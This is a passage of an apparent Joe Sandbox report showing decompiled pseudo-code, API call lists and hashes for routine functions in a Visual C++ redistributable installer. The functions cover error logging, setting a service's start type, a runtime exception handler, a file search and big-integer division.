                                                                          				} else {
                                                                          					_t38 =  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
                                                                          					if(_t38 >= 0) {
                                                                          						L7:
                                                                          						_t25 = _v8;
                                                                          						L8:
                                                                          						E0004FDC2(_t36, _a4, _a12, _t25, _a20);
                                                                          					} else {
                                                                          						E000137D3(_t29, "logutil.cpp", 0x333, _t38);
                                                                          					}
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					LocalFree(_v8);
                                                                          				}
                                                                          				return _t38;
                                                                          			}











                                                                          APIs
                                                                          • FormatMessageW.KERNEL32(00000900,?,00000000,00000000,00000000,00000000,?,00000000,?,?,000503EC,?,00000000,?,?,00000001), ref: 0004FD3F
                                                                          • GetLastError.KERNEL32(?,000503EC,?,00000000,?,?,00000001,?,00015523,?,?,00000000,?,?,0001528D,00000002), ref: 0004FD4B
                                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,000503EC,?,00000000,?,?,00000001,?,00015523,?,?), ref: 0004FDB3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatFreeLastLocalMessage
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 1365068426-637279948
                                                                          • Opcode ID: 113efc08d15925e5641fb05c13f435eb881e728ea4b617fbead8955eb766dda5
                                                                          • Instruction ID: 51fe58c2d27ce8a1a0ebfca9c71bc9bae979b56cf1ffc17bc12a11971c4bbff9
                                                                          • Opcode Fuzzy Hash: 113efc08d15925e5641fb05c13f435eb881e728ea4b617fbead8955eb766dda5
                                                                          • Instruction Fuzzy Hash: C5118FB1A0021AABDB21AF90CD05EFF7BAAEF54711F014039FD0596160D7719A60D7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 47%
                                                                          			E00036945(void* _a4, int _a8) {
                                                                          				short* _t11;
                                                                          
                                                                          				_t11 = 0;
                                                                          				if(ChangeServiceConfigW(_a4, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) == 0) {
                                                                          					_t14 =  <=  ? GetLastError() : _t5 & 0x0000ffff | 0x80070000;
                                                                          					_t11 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t5 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "msuengine.cpp", 0x1ec, _t11);
                                                                          					_push("Failed to set service start type.");
                                                                          					_push(_t11);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t11;
                                                                          			}





                                                                          APIs
                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000368EF,00000000,00000003), ref: 0003695C
                                                                          • GetLastError.KERNEL32(?,000368EF,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00036CE1,?), ref: 00036966
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeConfigErrorLastService
                                                                          • String ID: @Met$Failed to set service start type.$msuuser.cpp
                                                                          • API String ID: 1456623077-404797364
                                                                          • Opcode ID: 0d5e69378b3b09b6eb3ab460e98f40b65f4ad3de358555eba922567fa11218f2
                                                                          • Instruction ID: b5d9b5165a89f4fe3ecbbd418f5b6886272b658234d07297bf7092a401a60caa
                                                                          • Opcode Fuzzy Hash: 0d5e69378b3b09b6eb3ab460e98f40b65f4ad3de358555eba922567fa11218f2
                                                                          • Instruction Fuzzy Hash: 8EF0E532B0833037AB2026AA9C09FDB7ECCDF017B1F114326FD28E61D1DA258C0082E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E00043BB0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				char _v0;
                                                                          				signed int _v8;
                                                                          				intOrPtr _v524;
                                                                          				intOrPtr _v528;
                                                                          				void* _v532;
                                                                          				intOrPtr _v536;
                                                                          				char _v540;
                                                                          				intOrPtr _v544;
                                                                          				intOrPtr _v548;
                                                                          				intOrPtr _v552;
                                                                          				intOrPtr _v556;
                                                                          				intOrPtr _v560;
                                                                          				intOrPtr _v564;
                                                                          				intOrPtr _v568;
                                                                          				intOrPtr _v572;
                                                                          				intOrPtr _v576;
                                                                          				intOrPtr _v580;
                                                                          				intOrPtr _v584;
                                                                          				char _v724;
                                                                          				intOrPtr _v792;
                                                                          				intOrPtr _v800;
                                                                          				char _v804;
                                                                          				intOrPtr _v808;
                                                                          				char _v812;
                                                                          				void* __edi;
                                                                          				void* __ebp;
                                                                          				signed int _t40;
                                                                          				char* _t47;
                                                                          				intOrPtr _t49;
                                                                          				intOrPtr _t61;
                                                                          				intOrPtr _t62;
                                                                          				intOrPtr _t66;
                                                                          				intOrPtr _t67;
                                                                          				int _t68;
                                                                          				intOrPtr _t69;
                                                                          				signed int _t70;
                                                                          
                                                                          				_t69 = __esi;
                                                                          				_t66 = __edx;
                                                                          				_t61 = __ebx;
                                                                          				_t40 =  *0x7a008; // 0xfbf51acb
                                                                          				_t41 = _t40 ^ _t70;
                                                                          				_v8 = _t40 ^ _t70;
                                                                          				if(_a4 != 0xffffffff) {
                                                                          					_push(_a4);
                                                                          					E0003E7C0(_t41);
                                                                          					_pop(_t62);
                                                                          				}
                                                                          				E0003F670(_t67,  &_v804, 0, 0x50);
                                                                          				E0003F670(_t67,  &_v724, 0, 0x2cc);
                                                                          				_v812 =  &_v804;
                                                                          				_t47 =  &_v724;
                                                                          				_v808 = _t47;
                                                                          				_v548 = _t47;
                                                                          				_v552 = _t62;
                                                                          				_v556 = _t66;
                                                                          				_v560 = _t61;
                                                                          				_v564 = _t69;
                                                                          				_v568 = _t67;
                                                                          				_v524 = ss;
                                                                          				_v536 = cs;
                                                                          				_v572 = ds;
                                                                          				_v576 = es;
                                                                          				_v580 = fs;
                                                                          				_v584 = gs;
                                                                          				asm("pushfd");
                                                                          				_pop( *_t22);
                                                                          				_v540 = _v0;
                                                                          				_t25 =  &_v0; // 0x80004009
                                                                          				_t49 = _t25;
                                                                          				_v528 = _t49;
                                                                          				_v724 = 0x10001;
                                                                          				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                                          				_v804 = _a8;
                                                                          				_v800 = _a12;
                                                                          				_v792 = _v0;
                                                                          				_t68 = IsDebuggerPresent();
                                                                          				SetUnhandledExceptionFilter(0);
                                                                          				_t36 =  &_v812; // 0x80003cdd
                                                                          				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                                          					_push(_a4);
                                                                          					E0003E7C0(_t57);
                                                                          				}
                                                                          				return E0003DE36(_t61, _v8 ^ _t70, _t66, _t68, _t69);
                                                                          			}

                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00043CA8
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00043CB2
                                                                          • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 00043CBF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 3906539128-0
                                                                          • Opcode ID: 800142a682924ff000c28ef916ee4356a4675ea33ad6b6bb9f11dc228f02ac30
                                                                          • Instruction ID: a28bc5922cec0b6fe50a4f0a0a9776bf847ae76d08c3317a2b3364f2f183cf1c
                                                                          • Opcode Fuzzy Hash: 800142a682924ff000c28ef916ee4356a4675ea33ad6b6bb9f11dc228f02ac30
                                                                          • Instruction Fuzzy Hash: C631B375901218ABCB61DF64D9897DDBBB8AF08310F5042EAE40CA7261E7349B858F54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 74%
                                                                          			E00047A87(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                          				intOrPtr _v8;
                                                                          				signed int _v12;
                                                                          				intOrPtr _v28;
                                                                          				signed int _v32;
                                                                          				WCHAR* _v36;
                                                                          				signed int _v48;
                                                                          				intOrPtr _v556;
                                                                          				intOrPtr _v558;
                                                                          				struct _WIN32_FIND_DATAW _v604;
                                                                          				intOrPtr* _v608;
                                                                          				signed int _v612;
                                                                          				signed int _v616;
                                                                          				intOrPtr _v644;
                                                                          				intOrPtr _v648;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t40;
                                                                          				signed int _t45;
                                                                          				signed int _t48;
                                                                          				signed int _t50;
                                                                          				signed int _t51;
                                                                          				signed char _t53;
                                                                          				signed int _t62;
                                                                          				void* _t64;
                                                                          				union _FINDEX_INFO_LEVELS _t66;
                                                                          				signed int _t71;
                                                                          				intOrPtr* _t72;
                                                                          				signed int _t75;
                                                                          				void* _t82;
                                                                          				void* _t84;
                                                                          				signed int _t85;
                                                                          				void* _t89;
                                                                          				WCHAR* _t90;
                                                                          				void* _t91;
                                                                          				intOrPtr* _t94;
                                                                          				intOrPtr _t97;
                                                                          				void* _t99;
                                                                          				signed int _t100;
                                                                          				intOrPtr* _t104;
                                                                          				signed int _t107;
                                                                          				void* _t110;
                                                                          				signed int _t113;
                                                                          				void* _t114;
                                                                          				union _FINDEX_INFO_LEVELS _t115;
                                                                          				void* _t116;
                                                                          				void* _t119;
                                                                          				void* _t120;
                                                                          				void* _t121;
                                                                          				signed int _t122;
                                                                          				void* _t123;
                                                                          				void* _t124;
                                                                          				signed int _t128;
                                                                          				void* _t129;
                                                                          				signed int _t130;
                                                                          				void* _t131;
                                                                          				void* _t132;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_t94 = _a4;
                                                                          				_t2 = _t94 + 2; // 0x2
                                                                          				_t110 = _t2;
                                                                          				do {
                                                                          					_t40 =  *_t94;
                                                                          					_t94 = _t94 + 2;
                                                                          				} while (_t40 != 0);
                                                                          				_t113 = _a12;
                                                                          				_t97 = (_t94 - _t110 >> 1) + 1;
                                                                          				_v8 = _t97;
                                                                          				if(_t97 <= (_t40 | 0xffffffff) - _t113) {
                                                                          					_t5 = _t113 + 1; // 0x1
                                                                          					_t89 = _t5 + _t97;
                                                                          					_t120 = E0004523F(_t97, _t89, 2);
                                                                          					_t99 = _t119;
                                                                          					__eflags = _t113;
                                                                          					if(_t113 == 0) {
                                                                          						L6:
                                                                          						_push(_v8);
                                                                          						_t89 = _t89 - _t113;
                                                                          						_t45 = E00047897(_t99, _t120 + _t113 * 2, _t89, _a4);
                                                                          						_t130 = _t129 + 0x10;
                                                                          						__eflags = _t45;
                                                                          						if(__eflags != 0) {
                                                                          							goto L9;
                                                                          						} else {
                                                                          							_t82 = E00047D00(_a16, _t110, __eflags, _t120);
                                                                          							E0004511A(0);
                                                                          							_t84 = _t82;
                                                                          							goto L8;
                                                                          						}
                                                                          					} else {
                                                                          						_push(_t113);
                                                                          						_t85 = E00047897(_t99, _t120, _t89, _a8);
                                                                          						_t130 = _t129 + 0x10;
                                                                          						__eflags = _t85;
                                                                          						if(_t85 != 0) {
                                                                          							L9:
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							E00043D8A();
                                                                          							asm("int3");
                                                                          							_t128 = _t130;
                                                                          							_t131 = _t130 - 0x260;
                                                                          							_t48 =  *0x7a008; // 0xfbf51acb
                                                                          							_v48 = _t48 ^ _t128;
                                                                          							_t111 = _v28;
                                                                          							_t100 = _v32;
                                                                          							_push(_t89);
                                                                          							_t90 = _v36;
                                                                          							_push(_t120);
                                                                          							_push(_t113);
                                                                          							_t121 = 0x5c;
                                                                          							_v644 = _t111;
                                                                          							_v648 = 0x2f;
                                                                          							_t114 = 0x3a;
                                                                          							while(1) {
                                                                          								__eflags = _t100 - _t90;
                                                                          								if(_t100 == _t90) {
                                                                          									break;
                                                                          								}
                                                                          								_t50 =  *_t100 & 0x0000ffff;
                                                                          								__eflags = _t50 - _v612;
                                                                          								if(_t50 != _v612) {
                                                                          									__eflags = _t50 - _t121;
                                                                          									if(_t50 != _t121) {
                                                                          										__eflags = _t50 - _t114;
                                                                          										if(_t50 != _t114) {
                                                                          											_t100 = _t100 - 2;
                                                                          											__eflags = _t100;
                                                                          											continue;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								break;
                                                                          							}
                                                                          							_t122 =  *_t100 & 0x0000ffff;
                                                                          							__eflags = _t122 - _t114;
                                                                          							if(_t122 != _t114) {
                                                                          								L19:
                                                                          								_t51 = _t122;
                                                                          								_t115 = 0;
                                                                          								_t111 = 0x2f;
                                                                          								__eflags = _t51 - _t111;
                                                                          								if(_t51 == _t111) {
                                                                          									L23:
                                                                          									_t53 = 1;
                                                                          									__eflags = 1;
                                                                          								} else {
                                                                          									_t111 = 0x5c;
                                                                          									__eflags = _t51 - _t111;
                                                                          									if(_t51 == _t111) {
                                                                          										goto L23;
                                                                          									} else {
                                                                          										_t111 = 0x3a;
                                                                          										__eflags = _t51 - _t111;
                                                                          										if(_t51 == _t111) {
                                                                          											goto L23;
                                                                          										} else {
                                                                          											_t53 = 0;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								_t103 = (_t100 - _t90 >> 1) + 1;
                                                                          								asm("sbb eax, eax");
                                                                          								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
                                                                          								E0003F670(_t115,  &_v604, _t115, 0x250);
                                                                          								_t132 = _t131 + 0xc;
                                                                          								_t123 = FindFirstFileExW(_t90, _t115,  &_v604, _t115, _t115, _t115);
                                                                          								__eflags = _t123 - 0xffffffff;
                                                                          								if(_t123 != 0xffffffff) {
                                                                          									_t104 = _v608;
                                                                          									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
                                                                          									__eflags = _t62;
                                                                          									_v616 = _t62 >> 2;
                                                                          									_t64 = 0x2e;
                                                                          									do {
                                                                          										__eflags = _v604.cFileName - _t64;
                                                                          										if(_v604.cFileName != _t64) {
                                                                          											L36:
                                                                          											_push(_t104);
                                                                          											_t66 = E00047A87(_t104,  &(_v604.cFileName), _t90, _v612);
                                                                          											_t132 = _t132 + 0x10;
                                                                          											__eflags = _t66;
                                                                          											if(_t66 != 0) {
                                                                          												goto L26;
                                                                          											} else {
                                                                          												goto L37;
                                                                          											}
                                                                          										} else {
                                                                          											__eflags = _v558 - _t115;
                                                                          											if(_v558 == _t115) {
                                                                          												goto L37;
                                                                          											} else {
                                                                          												__eflags = _v558 - _t64;
                                                                          												if(_v558 != _t64) {
                                                                          													goto L36;
                                                                          												} else {
                                                                          													__eflags = _v556 - _t115;
                                                                          													if(_v556 == _t115) {
                                                                          														goto L37;
                                                                          													} else {
                                                                          														goto L36;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										goto L40;
                                                                          										L37:
                                                                          										_t71 = FindNextFileW(_t123,  &_v604);
                                                                          										_t104 = _v608;
                                                                          										__eflags = _t71;
                                                                          										_t64 = 0x2e;
                                                                          									} while (_t71 != 0);
                                                                          									_t72 = _t104;
                                                                          									_t107 = _v616;
                                                                          									_t111 =  *_t72;
                                                                          									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
                                                                          									__eflags = _t107 - _t75;
                                                                          									if(_t107 != _t75) {
                                                                          										E0004BFE0(_t90, _t111 + _t107 * 4, _t75 - _t107, 4, E000478A2);
                                                                          									}
                                                                          								} else {
                                                                          									_push(_v608);
                                                                          									_t66 = E00047A87(_t103, _t90, _t115, _t115);
                                                                          									L26:
                                                                          									_t115 = _t66;
                                                                          								}
                                                                          								__eflags = _t123 - 0xffffffff;
                                                                          								if(_t123 != 0xffffffff) {
                                                                          									FindClose(_t123);
                                                                          								}
                                                                          							} else {
                                                                          								__eflags = _t100 -  &(_t90[1]);
                                                                          								if(_t100 ==  &(_t90[1])) {
                                                                          									goto L19;
                                                                          								} else {
                                                                          									_push(_t111);
                                                                          									E00047A87(_t100, _t90, 0, 0);
                                                                          								}
                                                                          							}
                                                                          							_pop(_t116);
                                                                          							_pop(_t124);
                                                                          							__eflags = _v12 ^ _t128;
                                                                          							_pop(_t91);
                                                                          							return E0003DE36(_t91, _v12 ^ _t128, _t111, _t116, _t124);
                                                                          						} else {
                                                                          							goto L6;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t84 = 0xc;
                                                                          					L8:
                                                                          					return _t84;
                                                                          				}
                                                                          				L40:
                                                                          			}






























































                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: /
                                                                          • API String ID: 0-2043925204
                                                                          • Opcode ID: 5ba612371c22fb1021647f6afa877450b5f0ca7d87e2f0fae113a87421daed04
                                                                          • Instruction ID: 6671bdc4f9bba2cf2c03f3e5173488b91a43cb645c2d1d1cf095bf124580a6ce
                                                                          • Opcode Fuzzy Hash: 5ba612371c22fb1021647f6afa877450b5f0ca7d87e2f0fae113a87421daed04
                                                                          • Instruction Fuzzy Hash: 384118B29002196ACB249FB9DC89EBB77B8EB80314F504579F91997181E7309E81CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 90%
                                                                          			E0004A3B0(signed int* _a4, signed int* _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				signed int _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				signed int _v32;
                                                                          				signed int _v36;
                                                                          				signed int _v40;
                                                                          				signed int _v44;
                                                                          				signed int _v52;
                                                                          				signed int _v56;
                                                                          				signed int _v60;
                                                                          				signed int _v64;
                                                                          				signed int _v68;
                                                                          				signed int _v72;
                                                                          				signed int _v76;
                                                                          				signed int* _v80;
                                                                          				char _v540;
                                                                          				signed int _v544;
                                                                          				signed int _t197;
                                                                          				signed int _t198;
                                                                          				signed int* _t200;
                                                                          				signed int _t201;
                                                                          				signed int _t204;
                                                                          				signed int _t206;
                                                                          				signed int _t208;
                                                                          				signed int _t209;
                                                                          				signed int _t213;
                                                                          				signed int _t219;
                                                                          				intOrPtr _t225;
                                                                          				void* _t228;
                                                                          				signed int _t230;
                                                                          				signed int _t247;
                                                                          				signed int _t250;
                                                                          				void* _t253;
                                                                          				signed int _t256;
                                                                          				signed int* _t262;
                                                                          				signed int _t263;
                                                                          				signed int _t264;
                                                                          				void* _t265;
                                                                          				intOrPtr* _t266;
                                                                          				signed int _t267;
                                                                          				signed int _t269;
                                                                          				signed int _t270;
                                                                          				signed int _t271;
                                                                          				signed int _t272;
                                                                          				signed int* _t274;
                                                                          				signed int* _t278;
                                                                          				signed int _t279;
                                                                          				signed int _t280;
                                                                          				intOrPtr _t282;
                                                                          				void* _t286;
                                                                          				signed char _t292;
                                                                          				signed int _t295;
                                                                          				signed int _t303;
                                                                          				signed int _t306;
                                                                          				signed int _t307;
                                                                          				signed int _t309;
                                                                          				signed int _t311;
                                                                          				signed int _t313;
                                                                          				intOrPtr* _t314;
                                                                          				signed int _t318;
                                                                          				signed int _t322;
                                                                          				signed int* _t328;
                                                                          				signed int _t330;
                                                                          				signed int _t331;
                                                                          				signed int _t333;
                                                                          				void* _t334;
                                                                          				signed int _t336;
                                                                          				signed int _t338;
                                                                          				signed int _t341;
                                                                          				signed int _t342;
                                                                          				signed int* _t344;
                                                                          				signed int _t349;
                                                                          				signed int _t351;
                                                                          				void* _t355;
                                                                          				signed int _t359;
                                                                          				signed int _t360;
                                                                          				signed int _t362;
                                                                          				signed int* _t368;
                                                                          				signed int* _t369;
                                                                          				signed int* _t370;
                                                                          				signed int* _t373;
                                                                          
                                                                          				_t262 = _a4;
                                                                          				_t197 =  *_t262;
                                                                          				if(_t197 != 0) {
                                                                          					_t328 = _a8;
                                                                          					_t267 =  *_t328;
                                                                          					__eflags = _t267;
                                                                          					if(_t267 != 0) {
                                                                          						_t3 = _t197 - 1; // -1
                                                                          						_t349 = _t3;
                                                                          						_t4 = _t267 - 1; // -1
                                                                          						_t198 = _t4;
                                                                          						_v16 = _t349;
                                                                          						__eflags = _t198;
                                                                          						if(_t198 != 0) {
                                                                          							__eflags = _t198 - _t349;
                                                                          							if(_t198 > _t349) {
                                                                          								L23:
                                                                          								__eflags = 0;
                                                                          								return 0;
                                                                          							} else {
                                                                          								_t46 = _t198 + 1; // 0x0
                                                                          								_t306 = _t349 - _t198;
                                                                          								_v60 = _t46;
                                                                          								_t269 = _t349;
                                                                          								__eflags = _t349 - _t306;
                                                                          								if(_t349 < _t306) {
                                                                          									L21:
                                                                          									_t306 = _t306 + 1;
                                                                          									__eflags = _t306;
                                                                          								} else {
                                                                          									_t368 =  &(_t262[_t349 + 1]);
                                                                          									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                                                                          									__eflags = _t341;
                                                                          									while(1) {
                                                                          										__eflags =  *_t341 -  *_t368;
                                                                          										if( *_t341 !=  *_t368) {
                                                                          											break;
                                                                          										}
                                                                          										_t269 = _t269 - 1;
                                                                          										_t341 = _t341 - 4;
                                                                          										_t368 = _t368 - 4;
                                                                          										__eflags = _t269 - _t306;
                                                                          										if(_t269 >= _t306) {
                                                                          											continue;
                                                                          										} else {
                                                                          											goto L21;
                                                                          										}
                                                                          										goto L22;
                                                                          									}
                                                                          									_t369 = _a8;
                                                                          									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                                                                          									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                                                                          									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                                                                          										goto L21;
                                                                          									}
                                                                          								}
                                                                          								L22:
                                                                          								__eflags = _t306;
                                                                          								if(__eflags != 0) {
                                                                          									_t330 = _v60;
                                                                          									_t200 = _a8;
                                                                          									_t351 =  *(_t200 + _t330 * 4);
                                                                          									_t64 = _t330 * 4; // 0xffffe9e5
                                                                          									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                                                                          									_v36 = _t201;
                                                                          									asm("bsr eax, esi");
                                                                          									_v56 = _t351;
                                                                          									if(__eflags == 0) {
                                                                          										_t270 = 0x20;
                                                                          									} else {
                                                                          										_t270 = 0x1f - _t201;
                                                                          									}
                                                                          									_v40 = _t270;
                                                                          									_v64 = 0x20 - _t270;
                                                                          									__eflags = _t270;
                                                                          									if(_t270 != 0) {
                                                                          										_t292 = _v40;
                                                                          										_v36 = _v36 << _t292;
                                                                          										_v56 = _t351 << _t292 | _v36 >> _v64;
                                                                          										__eflags = _t330 - 2;
                                                                          										if(_t330 > 2) {
                                                                          											_t79 = _t330 * 4; // 0xe850ffff
                                                                          											_t81 =  &_v36;
                                                                          											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                                                                          											__eflags =  *_t81;
                                                                          										}
                                                                          									}
                                                                          									_v76 = 0;
                                                                          									_t307 = _t306 + 0xffffffff;
                                                                          									__eflags = _t307;
                                                                          									_v32 = _t307;
                                                                          									if(_t307 < 0) {
                                                                          										_t331 = 0;
                                                                          										__eflags = 0;
                                                                          									} else {
                                                                          										_t85 =  &(_t262[1]); // 0x4
                                                                          										_v20 =  &(_t85[_t307]);
                                                                          										_t206 = _t307 + _t330;
                                                                          										_t90 = _t262 - 4; // -4
                                                                          										_v12 = _t206;
                                                                          										_t278 = _t90 + _t206 * 4;
                                                                          										_v80 = _t278;
                                                                          										do {
                                                                          											__eflags = _t206 - _v16;
                                                                          											if(_t206 > _v16) {
                                                                          												_t207 = 0;
                                                                          												__eflags = 0;
                                                                          											} else {
                                                                          												_t207 = _t278[2];
                                                                          											}
                                                                          											__eflags = _v40;
                                                                          											_t311 = _t278[1];
                                                                          											_t279 =  *_t278;
                                                                          											_v52 = _t207;
                                                                          											_v44 = 0;
                                                                          											_v8 = _t207;
                                                                          											_v24 = _t279;
                                                                          											if(_v40 > 0) {
                                                                          												_t318 = _v8;
                                                                          												_t336 = _t279 >> _v64;
                                                                          												_t230 = E00059E20(_t311, _v40, _t318);
                                                                          												_t279 = _v40;
                                                                          												_t207 = _t318;
                                                                          												_t311 = _t336 | _t230;
                                                                          												_t359 = _v24 << _t279;
                                                                          												__eflags = _v12 - 3;
                                                                          												_v8 = _t318;
                                                                          												_v24 = _t359;
                                                                          												if(_v12 >= 3) {
                                                                          													_t279 = _v64;
                                                                          													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                                                                          													__eflags = _t360;
                                                                          													_t207 = _v8;
                                                                          													_v24 = _t360;
                                                                          												}
                                                                          											}
                                                                          											_t208 = E00059BF0(_t311, _t207, _v56, 0);
                                                                          											_v44 = _t262;
                                                                          											_t263 = _t208;
                                                                          											_v44 = 0;
                                                                          											_t209 = _t311;
                                                                          											_v8 = _t263;
                                                                          											_v28 = _t209;
                                                                          											_t333 = _t279;
                                                                          											_v72 = _t263;
                                                                          											_v68 = _t209;
                                                                          											__eflags = _t209;
                                                                          											if(_t209 != 0) {
                                                                          												L40:
                                                                          												_t264 = _t263 + 1;
                                                                          												asm("adc eax, 0xffffffff");
                                                                          												_t333 = _t333 + E0003E080(_t264, _t209, _v56, 0);
                                                                          												asm("adc esi, edx");
                                                                          												_t263 = _t264 | 0xffffffff;
                                                                          												_t209 = 0;
                                                                          												__eflags = 0;
                                                                          												_v44 = 0;
                                                                          												_v8 = _t263;
                                                                          												_v72 = _t263;
                                                                          												_v28 = 0;
                                                                          												_v68 = 0;
                                                                          											} else {
                                                                          												__eflags = _t263 - 0xffffffff;
                                                                          												if(_t263 > 0xffffffff) {
                                                                          													goto L40;
                                                                          												}
                                                                          											}
                                                                          											__eflags = 0;
                                                                          											if(0 <= 0) {
                                                                          												if(0 < 0) {
                                                                          													goto L44;
                                                                          												} else {
                                                                          													__eflags = _t333 - 0xffffffff;
                                                                          													if(_t333 <= 0xffffffff) {
                                                                          														while(1) {
                                                                          															L44:
                                                                          															_v8 = _v24;
                                                                          															_t228 = E0003E080(_v36, 0, _t263, _t209);
                                                                          															__eflags = _t311 - _t333;
                                                                          															if(__eflags < 0) {
                                                                          																break;
                                                                          															}
                                                                          															if(__eflags > 0) {
                                                                          																L47:
                                                                          																_t209 = _v28;
                                                                          																_t263 = _t263 + 0xffffffff;
                                                                          																_v72 = _t263;
                                                                          																asm("adc eax, 0xffffffff");
                                                                          																_t333 = _t333 + _v56;
                                                                          																__eflags = _t333;
                                                                          																_v28 = _t209;
                                                                          																asm("adc dword [ebp-0x28], 0x0");
                                                                          																_v68 = _t209;
                                                                          																if(_t333 == 0) {
                                                                          																	__eflags = _t333 - 0xffffffff;
                                                                          																	if(_t333 <= 0xffffffff) {
                                                                          																		continue;
                                                                          																	} else {
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																__eflags = _t228 - _v8;
                                                                          																if(_t228 <= _v8) {
                                                                          																	break;
                                                                          																} else {
                                                                          																	goto L47;
                                                                          																}
                                                                          															}
